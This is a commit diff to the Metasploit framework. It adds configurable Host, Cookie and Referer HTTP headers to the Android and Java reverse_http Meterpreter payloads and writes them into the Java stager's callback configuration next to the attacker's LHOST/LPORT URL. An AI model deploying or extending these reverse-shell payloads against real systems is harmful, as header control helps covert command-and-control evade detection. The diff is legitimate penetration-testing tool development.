add http headers to Android/Java

2024-11-12 11:52:01 +01:00 · 2017-09-13 13:00:21 +08:00 · 2017-09-13 13:00:21 +08:00 · a5af21fa1a
commit a5af21fa1a
parent ac79cc9f78
3 changed files with 22 additions and 3 deletions
--- a/lib/msf/core/payload/android/reverse_http.rb
+++ b/lib/msf/core/payload/android/reverse_http.rb
@ -18,6 +18,18 @@ module Payload::Android::ReverseHttp
  include Msf::Payload::Android
  include Msf::Payload::UUID::Options

+  #
+  # Register reverse_http specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([
+        OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+        OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+        OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
+      ], self.class)
+  end
+
  #
  # Generate the transport-specific configuration
  #
--- a/lib/msf/core/payload/java/reverse_http.rb
+++ b/lib/msf/core/payload/java/reverse_http.rb
@ -24,8 +24,11 @@ module Payload::Java::ReverseHttp
  def initialize(*args)
    super
    register_advanced_options([
-      Msf::OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
-      Msf::OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)'])
+      OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
+      OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
+      OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+      OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+      OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']),
    ])
  end

@ -64,6 +67,10 @@ module Payload::Java::ReverseHttp

    c =  ''
    c << "Spawn=#{ds["Spawn"] || 2}\n"
+    c << "HeaderUser-Agent=#{ds["MeterpreterUserAgent"]}\n" if ds["MeterpreterUserAgent"]
+    c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"]
+    c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"]
+    c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"]
    c << "URL=#{scheme}://#{ds['LHOST']}"
    c << ":#{ds['LPORT']}" if ds['LPORT']
    c << luri
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@ -298,7 +298,7 @@ module Msf
    # @return [String] Java payload as a JAR or WAR file
    def generate_java_payload
      payload_module = framework.payloads.create(payload)
-      payload_module.datastore.merge!(datastore)
+      payload_module.datastore.import_options_from_hash(datastore)
      case format
      when "raw", "jar"
        if payload_module.respond_to? :generate_jar